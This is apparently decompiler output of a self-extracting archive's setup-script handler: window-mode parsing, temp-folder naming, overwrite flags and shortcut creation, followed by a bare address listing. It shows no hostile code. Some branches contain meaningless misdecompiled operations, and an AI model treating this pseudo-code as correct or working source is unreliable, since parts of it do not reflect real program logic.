                                                    												_push(0x5c);
                                                    												_pop(__ecx);
                                                    												__eflags =  *((intOrPtr*)(__ebp + __eax * 2 - 0x1046)) - __cx;
                                                    												if(__eflags != 0) {
                                                    													__ebp - 0x1044 = E00CD05DA(__eflags, __ebp - 0x1044, "\\", __esi);
                                                    												}
                                                    											}
                                                    											__esi = E00CE3E13(__edi);
                                                    											__eax = __ebp - 0x1044;
                                                    											__eflags = __esi - 0x7ff;
                                                    											__esi = 0x800;
                                                    											if(__eflags < 0) {
                                                    												__ebp - 0x1044 = E00CD05DA(__eflags, __ebp - 0x1044, __edi, 0x800);
                                                    											}
                                                    											goto L65;
                                                    										}
                                                    										__eflags =  *((short*)(__edi + 2)) - 0x3a;
                                                    										if( *((short*)(__edi + 2)) == 0x3a) {
                                                    											goto L64;
                                                    										}
                                                    										goto L55;
                                                    									}
                                                    									__eflags =  *((intOrPtr*)(__edi + 2)) - __cx;
                                                    									if( *((intOrPtr*)(__edi + 2)) != __cx) {
                                                    										goto L53;
                                                    									}
                                                    									__edi = __edi + 4;
                                                    									__ebx = 0;
                                                    									__eflags =  *__edi - __bx;
                                                    									if( *__edi == __bx) {
                                                    										goto L178;
                                                    									} else {
                                                    										__ebp - 0x1044 = E00CD0602(__ebp - 0x1044, __edi, 0x800);
                                                    										goto L65;
                                                    									}
                                                    								}
                                                    							case 4:
                                                    								__eflags =  *0xd0a46c - 1;
                                                    								__eflags = __eax - 0xd0a46c;
                                                    								 *__edi =  *__edi + __ecx;
                                                    								__eflags =  *(__edx + 7) & __al;
                                                    								 *__eax =  *__eax + __al;
                                                    								__eflags =  *__eax;
                                                    							case 5:
                                                    								__eax =  *(__ebp - 0x588c) & 0x0000ffff;
                                                    								__ecx = 0;
                                                    								__eax =  *(__ebp - 0x588c) & 0x0000ffff;
                                                    								__eflags = __eax;
                                                    								if(__eax == 0) {
                                                    									L82:
                                                    									 *0xd08457 = __cl;
                                                    									 *0xd08460 = 1;
                                                    									goto L178;
                                                    								}
                                                    								__eax = __eax - 0x30;
                                                    								__eflags = __eax;
                                                    								if(__eax == 0) {
                                                    									 *0xd08457 = __cl;
                                                    									L81:
                                                    									 *0xd08460 = __cl;
                                                    									goto L178;
                                                    								}
                                                    								__eax = __eax - 1;
                                                    								__eflags = __eax;
                                                    								if(__eax == 0) {
                                                    									goto L82;
                                                    								}
                                                    								__eax = __eax - 1;
                                                    								__eflags = __eax;
                                                    								if(__eax != 0) {
                                                    									goto L178;
                                                    								}
                                                    								 *0xd08457 = 1;
                                                    								goto L81;
                                                    							case 6:
                                                    								__edi = 0;
                                                    								 *0xd0c577 = 1;
                                                    								__edi = 1;
                                                    								__eax = __ebp - 0x588c;
                                                    								__eflags =  *(__ebp - 0x588c) - 0x3c;
                                                    								__ebx = __esi;
                                                    								 *(__ebp - 0x14) = __eax;
                                                    								if( *(__ebp - 0x588c) != 0x3c) {
                                                    									L99:
                                                    									__eflags =  *((intOrPtr*)(__ebp + 0x10)) - 5;
                                                    									if( *((intOrPtr*)(__ebp + 0x10)) != 5) {
                                                    										__eflags =  *((intOrPtr*)(__ebp + 0x10)) - 4;
                                                    										if( *((intOrPtr*)(__ebp + 0x10)) != 4) {
                                                    											goto L178;
                                                    										}
                                                    										__eflags = __ebx - 6;
                                                    										if(__ebx != 6) {
                                                    											goto L178;
                                                    										}
                                                    										__ecx = 0;
                                                    										__eflags = 0;
                                                    										_push(0);
                                                    										L105:
                                                    										_push(__edi);
                                                    										_push(__eax);
                                                    										_push( *(__ebp + 8));
                                                    										__eax = E00CDD78F(__ebp);
                                                    										goto L178;
                                                    									}
                                                    									__eflags = __ebx - 9;
                                                    									if(__ebx != 9) {
                                                    										goto L178;
                                                    									}
                                                    									_push(1);
                                                    									goto L105;
                                                    								}
                                                    								__eax = __ebp - 0x588a;
                                                    								_push(0x3e);
                                                    								_push(__ebp - 0x588a);
                                                    								__eax = E00CE22C6(__ecx);
                                                    								_pop(__ecx);
                                                    								_pop(__ecx);
                                                    								__eflags = __eax;
                                                    								if(__eax == 0) {
                                                    									L98:
                                                    									__eax =  *(__ebp - 0x14);
                                                    									goto L99;
                                                    								}
                                                    								_t111 = __eax + 2; // 0x2
                                                    								__ecx = _t111;
                                                    								 *(__ebp - 0x14) = _t111;
                                                    								__ecx = 0;
                                                    								 *__eax = __cx;
                                                    								__eax = __ebp - 0x10c;
                                                    								_push(0x64);
                                                    								_push(__ebp - 0x10c);
                                                    								__eax = __ebp - 0x588a;
                                                    								_push(__ebp - 0x588a);
                                                    								__eax = E00CDAF98();
                                                    								 *(__ebp - 0x20) = __eax;
                                                    								__eflags = __eax;
                                                    								if(__eax == 0) {
                                                    									goto L98;
                                                    								}
                                                    								__esi = __eax;
                                                    								while(1) {
                                                    									__eflags =  *(__ebp - 0x10c);
                                                    									if( *(__ebp - 0x10c) == 0) {
                                                    										goto L98;
                                                    									}
                                                    									__eax = __ebp - 0x10c;
                                                    									__eax = E00CD1FBB(__ebp - 0x10c, L"HIDE");
                                                    									__eax =  ~__eax;
                                                    									asm("sbb eax, eax");
                                                    									__edi = __edi & __eax;
                                                    									__eax = __ebp - 0x10c;
                                                    									__eax = E00CD1FBB(__ebp - 0x10c, L"MAX");
                                                    									__eflags = __eax;
                                                    									if(__eax == 0) {
                                                    										_push(3);
                                                    										_pop(__edi);
                                                    									}
                                                    									__eax = __ebp - 0x10c;
                                                    									__eax = E00CD1FBB(__ebp - 0x10c, L"MIN");
                                                    									__eflags = __eax;
                                                    									if(__eax == 0) {
                                                    										_push(6);
                                                    										_pop(__edi);
                                                    									}
                                                    									_push(0x64);
                                                    									__eax = __ebp - 0x10c;
                                                    									_push(__ebp - 0x10c);
                                                    									_push(__esi);
                                                    									__esi = E00CDAF98();
                                                    									__eflags = __esi;
                                                    									if(__esi != 0) {
                                                    										continue;
                                                    									} else {
                                                    										goto L98;
                                                    									}
                                                    								}
                                                    								goto L98;
                                                    							case 7:
                                                    								__eflags = __ebx - 1;
                                                    								if(__eflags != 0) {
                                                    									__eflags = __ebx - 7;
                                                    									if(__ebx == 7) {
                                                    										__eflags =  *0xd0a46c - __edi;
                                                    										if( *0xd0a46c == __edi) {
                                                    											 *0xd0a46c = 2;
                                                    										}
                                                    										 *0xd09468 = 1;
                                                    									}
                                                    									goto L178;
                                                    								}
                                                    								__eax = __ebp - 0x788c;
                                                    								__edi = 0x800;
                                                    								GetTempPathW(0x800, __ebp - 0x788c) = __ebp - 0x788c;
                                                    								__eax = E00CCB690(__eflags, __ebp - 0x788c, 0x800);
                                                    								__ebx = 0;
                                                    								__esi = 0;
                                                    								_push(0);
                                                    								while(1) {
                                                    									_push( *0xcfe724);
                                                    									__ebp - 0x788c = E00CC4092(0xd0946a, __edi, L"%s%s%u", __ebp - 0x788c);
                                                    									__eax = E00CCA231(0xd0946a);
                                                    									__eflags = __al;
                                                    									if(__al == 0) {
                                                    										break;
                                                    									}
                                                    									__esi =  &(__esi->i);
                                                    									__eflags = __esi;
                                                    									_push(__esi);
                                                    								}
                                                    								__eax = SetDlgItemTextW( *(__ebp + 8), 0x66, 0xd0946a);
                                                    								__eflags =  *(__ebp - 0x588c) - __bx;
                                                    								if( *(__ebp - 0x588c) == __bx) {
                                                    									goto L178;
                                                    								}
                                                    								__eflags =  *0xd0c575 - __bl;
                                                    								if( *0xd0c575 != __bl) {
                                                    									goto L178;
                                                    								}
                                                    								__eax = 0;
                                                    								 *(__ebp - 0x444) = __ax;
                                                    								__eax = __ebp - 0x588c;
                                                    								_push(0x2c);
                                                    								_push(__ebp - 0x588c);
                                                    								__eax = E00CE22C6(__ecx);
                                                    								_pop(__ecx);
                                                    								_pop(__ecx);
                                                    								__eflags = __eax;
                                                    								if(__eax != 0) {
                                                    									L122:
                                                    									__eflags =  *(__ebp - 0x444) - __bx;
                                                    									if( *(__ebp - 0x444) == __bx) {
                                                    										__ebp - 0x1b894 = __ebp - 0x588c;
                                                    										E00CD0602(__ebp - 0x588c, __ebp - 0x1b894, 0x1000) = __ebp - 0x19894;
                                                    										__ebp - 0x444 = E00CD0602(__ebp - 0x444, __ebp - 0x19894, 0x200);
                                                    									}
                                                    									__ebp - 0x588c = E00CDADD2(__ebp - 0x588c);
                                                    									__eax = 0;
                                                    									 *(__ebp - 0x488c) = __ax;
                                                    									__ebp - 0x444 = __ebp - 0x588c;
                                                    									__eax = E00CDA7E4( *(__ebp + 8), __ebp - 0x588c, __ebp - 0x444, 0x24);
                                                    									__eflags = __eax - 6;
                                                    									if(__eax != 6) {
                                                    										__eax = 0;
                                                    										 *0xd08454 = 1;
                                                    										 *0xd0946a = __ax;
                                                    										__eax = EndDialog( *(__ebp + 8), 1);
                                                    									}
                                                    									goto L178;
                                                    								}
                                                    								__ax =  *(__ebp - 0x588c);
                                                    								__esi = __ebx;
                                                    								__eflags = __ax;
                                                    								if(__ax == 0) {
                                                    									goto L122;
                                                    								}
                                                    								__ecx = __ax & 0x0000ffff;
                                                    								while(1) {
                                                    									__eflags = __cx - 0x40;
                                                    									if(__cx == 0x40) {
                                                    										break;
                                                    									}
                                                    									__eax =  *(__ebp + __esi * 2 - 0x588a) & 0x0000ffff;
                                                    									__esi =  &(__esi->i);
                                                    									__ecx = __eax;
                                                    									__eflags = __ax;
                                                    									if(__ax != 0) {
                                                    										continue;
                                                    									}
                                                    									goto L122;
                                                    								}
                                                    								__ebp - 0x588a = __ebp - 0x588a + __esi * 2;
                                                    								__ebp - 0x444 = E00CD0602(__ebp - 0x444, __ebp - 0x444, 0x200);
                                                    								__eax = 0;
                                                    								__eflags = 0;
                                                    								 *(__ebp + __esi * 2 - 0x588c) = __ax;
                                                    								goto L122;
                                                    							case 8:
                                                    								__eflags = __ebx - 3;
                                                    								if(__ebx == 3) {
                                                    									__eflags =  *(__ebp - 0x588c) - __di;
                                                    									if(__eflags != 0) {
                                                    										__eax = __ebp - 0x588c;
                                                    										_push(__ebp - 0x588c);
                                                    										__eax = E00CE7625(__ebx, __edi);
                                                    										_pop(__ecx);
                                                    										 *0xd1fc9c = __eax;
                                                    									}
                                                    									__eax = __ebp + 0xc;
                                                    									_push(__ebp + 0xc);
                                                    									 *0xd1fc98 = E00CDB48E(__ecx, __edx, __eflags);
                                                    								}
                                                    								 *0xd0c576 = 1;
                                                    								goto L178;
                                                    							case 9:
                                                    								__eflags = __ebx - 6;
                                                    								if(__ebx != 6) {
                                                    									goto L178;
                                                    								}
                                                    								__eax = 0;
                                                    								 *(__ebp - 0x2844) = __ax;
                                                    								__eax =  *(__ebp - 0x1b894) & 0x0000ffff;
                                                    								__eax = E00CE79E9( *(__ebp - 0x1b894) & 0x0000ffff);
                                                    								__eflags = __eax - 0x50;
                                                    								if(__eax == 0x50) {
                                                    									 *(__ebp - 0x14) = 2;
                                                    									__eax = 0xd1cb82;
                                                    								} else {
                                                    									__eflags = __eax - 0x54;
                                                    									if(__eax == 0x54) {
                                                    										 *(__ebp - 0x14) = 7;
                                                    										__eax = 0xd1bb82;
                                                    									} else {
                                                    										 *(__ebp - 0x14) = 0x10;
                                                    										__eax = 0xd1db82;
                                                    									}
                                                    								}
                                                    								__esi = 0x800;
                                                    								__ebp - 0x2844 = E00CD0602(__ebp - 0x2844, __ebp - 0x2844, 0x800);
                                                    								__eax = 0;
                                                    								 *(__ebp - 0x9894) = __ax;
                                                    								 *(__ebp - 0x1844) = __ax;
                                                    								__ebp - 0x19894 = __ebp - 0x688c;
                                                    								__eax = E00CD0602(__ebp - 0x688c, __ebp - 0x19894, 0x800);
                                                    								_push(0x22);
                                                    								_pop(__ebx);
                                                    								__eflags =  *(__ebp - 0x688c) - __bx;
                                                    								if( *(__ebp - 0x688c) != __bx) {
                                                    									__ebp - 0x688c = E00CCA231(__ebp - 0x688c);
                                                    									__eflags = __al;
                                                    									if(__al != 0) {
                                                    										goto L163;
                                                    									}
                                                    									__ax =  *(__ebp - 0x688c);
                                                    									__esi = __ebp - 0x688c;
                                                    									__ebx = __edi;
                                                    									__eflags = __ax;
                                                    									if(__ax == 0) {
                                                    										__esi = 0x800;
                                                    										goto L163;
                                                    									}
                                                    									__edi = __ax & 0x0000ffff;
                                                    									do {
                                                    										_push(0x20);
                                                    										_pop(__eax);
                                                    										__eflags = __di - __ax;
                                                    										if(__di == __ax) {
                                                    											L149:
                                                    											__eax = 0;
                                                    											__esi->i = __ax;
                                                    											__ebp - 0x688c = E00CCA231(__ebp - 0x688c);
                                                    											__eflags = __al;
                                                    											if(__al == 0) {
                                                    												L158:
                                                    												__esi->i = __di;
                                                    												goto L159;
                                                    											}
                                                    											__ebp - 0x688c = E00CCA243(__ebp - 0x688c);
                                                    											__eax = E00CCA28F(__eax);
                                                    											__eflags = __al;
                                                    											if(__al != 0) {
                                                    												goto L158;
                                                    											}
                                                    											_push(0x2f);
                                                    											_pop(__ecx);
                                                    											__eax =  &(__esi->i);
                                                    											__ebx = __esi;
                                                    											__eflags = __di - __cx;
                                                    											if(__di != __cx) {
                                                    												_push(0x20);
                                                    												__esi = __eax;
                                                    												_pop(__eax);
                                                    												while(1) {
                                                    													__eflags = __esi->i - __ax;
                                                    													if(__esi->i != __ax) {
                                                    														break;
                                                    													}
                                                    													__esi =  &(__esi->i);
                                                    													__eflags = __esi;
                                                    												}
                                                    												__ecx = __ebp - 0x1844;
                                                    												__eax = __esi;
                                                    												__edx = 0x400;
                                                    												L157:
                                                    												__eax = E00CD0602(__ecx, __eax, __edx);
                                                    												 *__ebx = __di;
                                                    												goto L159;
                                                    											}
                                                    											 *(__ebp - 0x1844) = __cx;
                                                    											__edx = 0x3ff;
                                                    											__ecx = __ebp - 0x1842;
                                                    											goto L157;
                                                    										}
                                                    										_push(0x2f);
                                                    										_pop(__eax);
                                                    										__eflags = __di - __ax;
                                                    										if(__di != __ax) {
                                                    											goto L159;
                                                    										}
                                                    										goto L149;
                                                    										L159:
                                                    										__esi =  &(__esi->i);
                                                    										__eax = __esi->i & 0x0000ffff;
                                                    										__edi = __esi->i & 0x0000ffff;
                                                    										__eflags = __ax;
                                                    									} while (__ax != 0);
                                                    									__esi = 0x800;
                                                    									__eflags = __ebx;
                                                    									if(__ebx != 0) {
                                                    										__eax = 0;
                                                    										 *__ebx = __ax;
                                                    									}
                                                    									goto L163;
                                                    								} else {
                                                    									__ebp - 0x19892 = __ebp - 0x688c;
                                                    									E00CD0602(__ebp - 0x688c, __ebp - 0x19892, 0x800) = __ebp - 0x688a;
                                                    									_push(__ebx);
                                                    									_push(__ebp - 0x688a);
                                                    									__eax = E00CE22C6(__ecx);
                                                    									_pop(__ecx);
                                                    									_pop(__ecx);
                                                    									__eflags = __eax;
                                                    									if(__eax != 0) {
                                                    										__ecx = 0;
                                                    										 *__eax = __cx;
                                                    										__ebp - 0x1844 = E00CD0602(__ebp - 0x1844, __ebp - 0x1844, 0x400);
                                                    									}
                                                    									L163:
                                                    									__eflags =  *((short*)(__ebp - 0x11894));
                                                    									if( *((short*)(__ebp - 0x11894)) != 0) {
                                                    										__ebp - 0x9894 = __ebp - 0x11894;
                                                    										__eax = E00CCB6C4(__ebp - 0x11894, __ebp - 0x9894, __esi);
                                                    									}
                                                    									__ebp - 0xb894 = __ebp - 0x688c;
                                                    									__eax = E00CCB6C4(__ebp - 0x688c, __ebp - 0xb894, __esi);
                                                    									__eflags =  *(__ebp - 0x2844);
                                                    									if(__eflags == 0) {
                                                    										__ebp - 0x2844 = E00CDB425(__ecx, __ebp - 0x2844,  *(__ebp - 0x14));
                                                    									}
                                                    									__ebp - 0x2844 = E00CCB690(__eflags, __ebp - 0x2844, __esi);
                                                    									__eflags =  *((short*)(__ebp - 0x17894));
                                                    									if(__eflags != 0) {
                                                    										__ebp - 0x17894 = __ebp - 0x2844;
                                                    										E00CD05DA(__eflags, __ebp - 0x2844, __ebp - 0x17894, __esi) = __ebp - 0x2844;
                                                    										__eax = E00CCB690(__eflags, __ebp - 0x2844, __esi);
                                                    									}
                                                    									__ebp - 0x2844 = __ebp - 0xc894;
                                                    									__eax = E00CD0602(__ebp - 0xc894, __ebp - 0x2844, __esi);
                                                    									__eflags =  *(__ebp - 0x13894);
                                                    									__eax = __ebp - 0x13894;
                                                    									if(__eflags == 0) {
                                                    										__eax = __ebp - 0x19894;
                                                    									}
                                                    									__ebp - 0x2844 = E00CD05DA(__eflags, __ebp - 0x2844, __ebp - 0x2844, __esi);
                                                    									__eax = __ebp - 0x2844;
                                                    									__eflags = E00CCB92D(__ebp - 0x2844);
                                                    									if(__eflags == 0) {
                                                    										L173:
                                                    										__ebp - 0x2844 = E00CD05DA(__eflags, __ebp - 0x2844, L".lnk", __esi);
                                                    										goto L174;
                                                    									} else {
                                                    										__eflags = __eax;
                                                    										if(__eflags == 0) {
                                                    											L174:
                                                    											__ebx = 0;
                                                    											__ebp - 0x2844 = E00CCA0B1(0, __ecx, __edi, __ebp, __ebp - 0x2844, 1, 0);
                                                    											__ebp - 0xb894 = __ebp - 0xa894;
                                                    											E00CD0602(__ebp - 0xa894, __ebp - 0xb894, __esi) = __ebp - 0xa894;
                                                    											__eax = E00CCC2E4(__eflags, __ebp - 0xa894);
                                                    											__esi =  *(__ebp - 0x1844) & 0x0000ffff;
                                                    											__eax = __ebp - 0x1844;
                                                    											__edx =  *(__ebp - 0x9894) & 0x0000ffff;
                                                    											__edi = __ebp - 0xa894;
                                                    											__ecx =  *(__ebp - 0x15894) & 0x0000ffff;
                                                    											__esi =  ~( *(__ebp - 0x1844) & 0x0000ffff);
                                                    											asm("sbb esi, esi");
                                                    											__esi =  ~( *(__ebp - 0x1844) & 0x0000ffff) & __ebp - 0x00001844;
                                                    											__edx =  ~( *(__ebp - 0x9894) & 0x0000ffff);
                                                    											__eax = __ebp - 0x9894;
                                                    											asm("sbb edx, edx");
                                                    											__edx =  ~( *(__ebp - 0x9894) & 0x0000ffff) & __ebp - 0x00009894;
                                                    											__ecx =  ~( *(__ebp - 0x15894) & 0x0000ffff);
                                                    											__eax = __ebp - 0x15894;
                                                    											asm("sbb ecx, ecx");
                                                    											__ecx =  ~( *(__ebp - 0x15894) & 0x0000ffff) & __ebp - 0x00015894;
                                                    											 *(__ebp - 0xa894) & 0x0000ffff =  ~( *(__ebp - 0xa894) & 0x0000ffff);
                                                    											asm("sbb eax, eax");
                                                    											 ~( *(__ebp - 0xa894) & 0x0000ffff) & __edi = __ebp - 0x2844;
                                                    											__ebp - 0xb894 = E00CDA48A( ~( *(__ebp - 0x15894) & 0x0000ffff) & __ebp - 0x00015894, 0, __ebp - 0xb894, __ebp - 0x2844,  ~( *(__ebp - 0xa894) & 0x0000ffff) & __edi, __ecx,  ~( *(__ebp - 0x9894) & 0x0000ffff) & __ebp - 0x00009894, __esi);
                                                    											__eflags =  *(__ebp - 0xc894) - __bx;
                                                    											if( *(__ebp - 0xc894) != __bx) {
                                                    												_push(0);
                                                    												__eax = __ebp - 0xc894;
                                                    												_push(__ebp - 0xc894);
                                                    												_push(5);
                                                    												_push(0x1000);
                                                    												__eax =  *0xd2308c();
                                                    											}
                                                    											goto L178;
                                                    										}
                                                    										goto L173;
                                                    									}
                                                    								}
                                                    							case 0xa:
                                                    								__eflags = __ebx - 7;
                                                    								if(__ebx == 7) {
                                                    									 *0xd0a470 = 1;
                                                    								}
                                                    								goto L178;
                                                    							case 0xb:
                                                    								__eax =  *(__ebp - 0x588c) & 0x0000ffff;
                                                    								__eax = E00CE79E9( *(__ebp - 0x588c) & 0x0000ffff);
                                                    								__eflags = __eax - 0x46;
                                                    								if(__eax == 0x46) {
                                                    									 *0xd08461 = 1;
                                                    								} else {
                                                    									__eflags = __eax - 0x55;
                                                    									if(__eax == 0x55) {
                                                    										 *0xd08462 = 1;
                                                    									} else {
                                                    										__eax = 0;
                                                    										 *0xd08461 = __al;
                                                    										 *0xd08462 = __al;
                                                    									}
                                                    								}
                                                    								goto L178;
                                                    							case 0xc:
                                                    								 *0xd17b7a = 1;
                                                    								__eax = __eax + 0xd17b7a;
                                                    								_t125 = __esi + 0x39;
                                                    								 *_t125 =  *(__esi + 0x39) + __esp;
                                                    								__eflags =  *_t125;
                                                    								__ebp = 0xffffa774;
                                                    								if( *_t125 != 0) {
                                                    									_t127 = __ebp - 0x588c; // 0xffff4ee8
                                                    									__eax = _t127;
                                                    									 *0xcfe728 = E00CD1FA7(_t127);
                                                    								}
                                                    								goto L178;
                                                    						}
                                                    						L4:
                                                    						_push(0x1000);
                                                    						_push(_t311);
                                                    						_push(_t237);
                                                    						_t237 = E00CDAF98();
                                                    						_t311 = _t311 + 0x2000;
                                                    						_t308 = _t308 - 1;
                                                    						if(_t308 != 0) {
                                                    							goto L4;
                                                    						} else {
                                                    							_t312 = _t308;
                                                    							goto L6;
                                                    						}
                                                    						L178:
                                                    						_push(0x1000);
                                                    						_t221 = _t316 - 0x15; // 0xffffa75f
                                                    						_t222 = _t316 - 0xd; // 0xffffa767
                                                    						_t223 = _t316 - 0x588c; // 0xffff4ee8
                                                    						_t224 = _t316 - 0xf894; // 0xfffeaee0
                                                    						_push( *((intOrPtr*)(_t316 + 0xc)));
                                                    						_t232 = E00CDB314(_t308, _t316);
                                                    						_t293 =  *((intOrPtr*)(_t316 + 0x10));
                                                    						 *((intOrPtr*)(_t316 + 0xc)) = _t232;
                                                    					} while (_t232 != 0);
                                                    				}
                                                    			}











                                                    0x00cdcee3
                                                    0x00cdcee5
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdceb7
                                                    0x00cdceb7
                                                    0x00cdceb8
                                                    0x00cdceb8
                                                    0x00cdcef1
                                                    0x00cdcef7
                                                    0x00cdcefe
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdcf04
                                                    0x00cdcf0a
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdcf10
                                                    0x00cdcf12
                                                    0x00cdcf19
                                                    0x00cdcf1f
                                                    0x00cdcf21
                                                    0x00cdcf22
                                                    0x00cdcf27
                                                    0x00cdcf28
                                                    0x00cdcf29
                                                    0x00cdcf2b
                                                    0x00cdcf7b
                                                    0x00cdcf7b
                                                    0x00cdcf82
                                                    0x00cdcf90
                                                    0x00cdcfa1
                                                    0x00cdcfaf
                                                    0x00cdcfaf
                                                    0x00cdcfbb
                                                    0x00cdcfc0
                                                    0x00cdcfc2
                                                    0x00cdcfd2
                                                    0x00cdcfdc
                                                    0x00cdcfe1
                                                    0x00cdcfe4
                                                    0x00cdcfef
                                                    0x00cdcff1
                                                    0x00cdcff8
                                                    0x00cdcffe
                                                    0x00cdcffe
                                                    0x00000000
                                                    0x00cdcfe4
                                                    0x00cdcf2d
                                                    0x00cdcf34
                                                    0x00cdcf36
                                                    0x00cdcf39
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdcf3b
                                                    0x00cdcf3e
                                                    0x00cdcf3e
                                                    0x00cdcf42
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdcf44
                                                    0x00cdcf4c
                                                    0x00cdcf4d
                                                    0x00cdcf4f
                                                    0x00cdcf52
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdcf54
                                                    0x00cdcf61
                                                    0x00cdcf6c
                                                    0x00cdcf71
                                                    0x00cdcf71
                                                    0x00cdcf73
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdd030
                                                    0x00cdd033
                                                    0x00cdd035
                                                    0x00cdd03c
                                                    0x00cdd03e
                                                    0x00cdd044
                                                    0x00cdd045
                                                    0x00cdd04a
                                                    0x00cdd04b
                                                    0x00cdd04b
                                                    0x00cdd050
                                                    0x00cdd053
                                                    0x00cdd059
                                                    0x00cdd059
                                                    0x00cdd05e
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdd06a
                                                    0x00cdd06d
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdd073
                                                    0x00cdd075
                                                    0x00cdd07c
                                                    0x00cdd084
                                                    0x00cdd08a
                                                    0x00cdd08d
                                                    0x00cdd0b0
                                                    0x00cdd0b7
                                                    0x00cdd08f
                                                    0x00cdd08f
                                                    0x00cdd092
                                                    0x00cdd0a2
                                                    0x00cdd0a9
                                                    0x00cdd094
                                                    0x00cdd094
                                                    0x00cdd09b
                                                    0x00cdd09b
                                                    0x00cdd092
                                                    0x00cdd0bc
                                                    0x00cdd0ca
                                                    0x00cdd0cf
                                                    0x00cdd0d1
                                                    0x00cdd0d8
                                                    0x00cdd0e7
                                                    0x00cdd0ee
                                                    0x00cdd0f3
                                                    0x00cdd0f5
                                                    0x00cdd0f6
                                                    0x00cdd0fd
                                                    0x00cdd150
                                                    0x00cdd155
                                                    0x00cdd157
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdd15d
                                                    0x00cdd164
                                                    0x00cdd16a
                                                    0x00cdd16c
                                                    0x00cdd16f
                                                    0x00cdd221
                                                    0x00000000
                                                    0x00cdd221
                                                    0x00cdd175
                                                    0x00cdd178
                                                    0x00cdd178
                                                    0x00cdd17a
                                                    0x00cdd17b
                                                    0x00cdd17e
                                                    0x00cdd188
                                                    0x00cdd188
                                                    0x00cdd18a
                                                    0x00cdd194
                                                    0x00cdd199
                                                    0x00cdd19b
                                                    0x00cdd1fd
                                                    0x00cdd1fd
                                                    0x00000000
                                                    0x00cdd1fd
                                                    0x00cdd1a4
                                                    0x00cdd1aa
                                                    0x00cdd1af
                                                    0x00cdd1b1
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdd1b3
                                                    0x00cdd1b5
                                                    0x00cdd1b6
                                                    0x00cdd1b9
                                                    0x00cdd1bb
                                                    0x00cdd1be
                                                    0x00cdd1d4
                                                    0x00cdd1d6
                                                    0x00cdd1d8
                                                    0x00cdd1de
                                                    0x00cdd1de
                                                    0x00cdd1e1
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdd1db
                                                    0x00cdd1db
                                                    0x00cdd1db
                                                    0x00cdd1e3
                                                    0x00cdd1e9
                                                    0x00cdd1eb
                                                    0x00cdd1f0
                                                    0x00cdd1f3
                                                    0x00cdd1f8
                                                    0x00000000
                                                    0x00cdd1f8
                                                    0x00cdd1c0
                                                    0x00cdd1c7
                                                    0x00cdd1cc
                                                    0x00000000
                                                    0x00cdd1cc
                                                    0x00cdd180
                                                    0x00cdd182
                                                    0x00cdd183
                                                    0x00cdd186
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdd200
                                                    0x00cdd200
                                                    0x00cdd203
                                                    0x00cdd206
                                                    0x00cdd208
                                                    0x00cdd208
                                                    0x00cdd211
                                                    0x00cdd216
                                                    0x00cdd218
                                                    0x00cdd21a
                                                    0x00cdd21c
                                                    0x00cdd21c
                                                    0x00000000
                                                    0x00cdd0ff
                                                    0x00cdd107
                                                    0x00cdd113
                                                    0x00cdd119
                                                    0x00cdd11a
                                                    0x00cdd11b
                                                    0x00cdd120
                                                    0x00cdd121
                                                    0x00cdd122
                                                    0x00cdd124
                                                    0x00cdd12a
                                                    0x00cdd12c
                                                    0x00cdd13f
                                                    0x00cdd13f
                                                    0x00cdd226
                                                    0x00cdd226
                                                    0x00cdd22e
                                                    0x00cdd238
                                                    0x00cdd23f
                                                    0x00cdd23f
                                                    0x00cdd24c
                                                    0x00cdd253
                                                    0x00cdd258
                                                    0x00cdd260
                                                    0x00cdd26c
                                                    0x00cdd26c
                                                    0x00cdd279
                                                    0x00cdd27e
                                                    0x00cdd286
                                                    0x00cdd290
                                                    0x00cdd29d
                                                    0x00cdd2a4
                                                    0x00cdd2a4
                                                    0x00cdd2b1
                                                    0x00cdd2b8
                                                    0x00cdd2bd
                                                    0x00cdd2c5
                                                    0x00cdd2cb
                                                    0x00cdd2cd
                                                    0x00cdd2cd
                                                    0x00cdd2e2
                                                    0x00cdd2e7
                                                    0x00cdd2f3
                                                    0x00cdd2f5
                                                    0x00cdd306
                                                    0x00cdd313
                                                    0x00000000
                                                    0x00cdd2f7
                                                    0x00cdd302
                                                    0x00cdd304
                                                    0x00cdd318
                                                    0x00cdd318
                                                    0x00cdd324
                                                    0x00cdd331
                                                    0x00cdd33d
                                                    0x00cdd344
                                                    0x00cdd349
                                                    0x00cdd350
                                                    0x00cdd356
                                                    0x00cdd35d
                                                    0x00cdd363
                                                    0x00cdd36a
                                                    0x00cdd36c
                                                    0x00cdd36e
                                                    0x00cdd370
                                                    0x00cdd372
                                                    0x00cdd378
                                                    0x00cdd37a
                                                    0x00cdd37c
                                                    0x00cdd37e
                                                    0x00cdd384
                                                    0x00cdd386
                                                    0x00cdd390
                                                    0x00cdd393
                                                    0x00cdd399
                                                    0x00cdd3a8
                                                    0x00cdd3ad
                                                    0x00cdd3b4
                                                    0x00cdd3b6
                                                    0x00cdd3b7
                                                    0x00cdd3bd
                                                    0x00cdd3be
                                                    0x00cdd3c0
                                                    0x00cdd3c5
                                                    0x00cdd3c5
                                                    0x00000000
                                                    0x00cdd3b4
                                                    0x00000000
                                                    0x00cdd304
                                                    0x00cdd2f5
                                                    0x00000000
                                                    0x00cdd3cd
                                                    0x00cdd3d0
                                                    0x00cdd3d2
                                                    0x00cdd3d2
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdcd17
                                                    0x00cdcd1f
                                                    0x00cdcd25
                                                    0x00cdcd28
                                                    0x00cdcd4c
                                                    0x00cdcd2a
                                                    0x00cdcd2a
                                                    0x00cdcd2d
                                                    0x00cdcd40
                                                    0x00cdcd2f
                                                    0x00cdcd2f
                                                    0x00cdcd31
                                                    0x00cdcd36
                                                    0x00cdcd36
                                                    0x00cdcd2d
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdce5d
                                                    0x00cdce5e
                                                    0x00cdce63
                                                    0x00cdce63
                                                    0x00cdce63
                                                    0x00cdce66
                                                    0x00cdce6b
                                                    0x00cdce71
                                                    0x00cdce71
                                                    0x00cdce7d
